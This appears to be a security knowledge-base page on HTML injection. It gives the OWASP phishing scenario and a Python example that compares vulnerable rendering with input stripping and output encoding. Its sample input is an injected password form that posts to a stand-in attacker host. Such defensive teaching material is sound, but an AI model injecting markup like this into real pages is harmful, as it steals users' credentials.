HTML Injection


This vulnerability occurs when user input is not correctly sanitized and the output is not encoded.

Business Impact

A successful injection will allow the attacker to send a malicious HTML page to a victim.


Look for HTML elements in the incoming HTTP stream that contain the user input, and simply remove any HTML-syntax substrings (like tags and links) from any user-supplied text.

More Details

OWASP Attack scenario

A possible attack scenario is demonstrated below:

1. Attacker discovers injection vulnerability and decides to use an HTML injection attack.
2. Attacker crafts malicious link, including his injected HTML content, and sends it to a user via email.
3. The user visits the page due to the page being located within a trusted domain.
4. The attacker’s injected HTML is rendered and presented to the user asking for a username and password.
5. The user enters a username and password, which are both sent to the attacker’s server.
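The root cause and the two defenses named on this page (removing HTML syntax from input, encoding output), shown as an added example that is not code from Kayran or OWASP. The function names, the "Results for" template and the sample input are constructed for illustration; the check parses each rendered fragment and lists the elements a browser would create from it.

```python
import html
from html.parser import HTMLParser


class _Collector(HTMLParser):
    """Records the elements and text a browser would see in a fragment."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.text = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        self.text.append(data)


def _parse(fragment):
    p = _Collector()
    p.feed(fragment)
    p.close()
    return p


def elements_in(fragment):
    """Element names created when the fragment is parsed as HTML."""
    return _parse(fragment).tags


def strip_markup(value):
    """Remove HTML-syntax substrings (tags, links) and keep only the text."""
    return "".join(_parse(value).text)


def render_vulnerable(name):
    # Input is concatenated into the page unchanged: injected tags become elements.
    return "<p>Results for: " + name + "</p>"


def render_encoded(name):
    # Output encoding: <, >, &, " and ' become entities and display as text.
    return "<p>Results for: " + html.escape(name, quote=True) + "</p>"


def render_stripped_and_encoded(name):
    # Both defenses: strip markup from the input, then encode on output.
    return render_encoded(strip_markup(name))


# Constructed sample input modelled on the scenario above (credential prompt).
INJECTED = ('Bob<form action="https://attacker.invalid/login">'
            'Password: <input type="password" name="p"></form>')
```

Calling `elements_in()` on the rendered output in a unit test is a cheap regression check: any element beyond the template's own means user input reached the page as markup.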

